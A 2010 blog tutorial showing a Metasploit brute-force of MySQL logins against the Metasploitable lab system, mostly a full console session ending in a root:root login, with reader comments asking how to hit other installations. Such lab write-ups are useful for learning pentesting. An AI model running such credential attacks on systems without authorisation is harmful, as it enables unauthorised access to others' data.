Bruteforce MySQL Using Metasploit…

July 3, 2010 at 11:52 am (Metasploit, Security)

Hey guys,

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable distribution I mentioned in my previous post. This is very simple and shouldn’t take long to demonstrate, so here goes:

root@bt:/pentest/exploits/framework3# ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...

Auxiliary
=========

Name Rank Description
---- ---- -----------
admin/mysql/mysql_enum normal MySQL Enumeration Module
admin/mysql/mysql_sql normal MySQL SQL Generic Query
admin/tikiwiki/tikidblib normal TikiWiki information disclosure
scanner/mysql/mysql_login normal MySQL Login Utility
scanner/mysql/mysql_version normal MySQL Server Version Enumeration

Exploits
========

Name Rank Description
---- ---- -----------
linux/mysql/mysql_yassl_getname good MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello good MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello average MySQL yaSSL SSL Hello Message Buffer Overflow

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /root/password.txt no File containing passwords, one per line
RHOSTS 10.113.8.102 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE /root/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > exploit

[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Bingo! We found the root password which is simply ‘root’ 🙂 Now let’s double check this:

root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)

mysql>

Now we have complete control over their database, yay! 🙂

Advertisements

6 Comments

  1. Jonathan said,

    I tried to attack mysql 5.0.77 on CentOS and got this response from metasploit:

    “Unsupported target version of MySQL detected. Skipping”

    What versions of mysql can I attack?

  2. Jonathan said,

    Poking around, I guess I have to modify

    msf3/modules/auxiliary/scanner/mysql/mysql_version.rb

    correct?

  3. 0xzoidberg said,

    Hey Jonathan,

    Sorry for the late reply in the middle of moving jobs and house 🙂

    I demonstrated a simple MySQL brute force attack using the mysql_login module. This will work with any recent version of MySQL, as its just running through a username/password list and trying the combinations, very simple brute force attack.

    The module that you are talking about just version enumerates a MySQL server (basically tells you what version of MySQL its running) so it is not an intrusive module nor is the scanner.

    Also, if you run the following commands:

    info auxiliary/scanner/mysql/mysql_version

    and

    info auxiliary/scanner/mysql/mysql_login

    It will tell you what the module does, what version it affects, etc…

    If you show me what your doing and how your doing it also what you want to achieve I will endeavour to help you..

    zoidberg

  4. Marshall said,

    Hi 0xzoidberg,
    I have The Same Problem as Jonathan

    i Tried to Attack Mysql (came with wamp server) on an xp machine but i had this message

    [-] 192.168.0.10:3306 – Unsupported target version of MySQL detected. Skipping.
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    Help
    Thanx !

  5. zeestuff said,

    can you tell me where i can find the password.txt ?

  6. NightFury said,

    Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, PASS_FILE.

    what to do ?!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: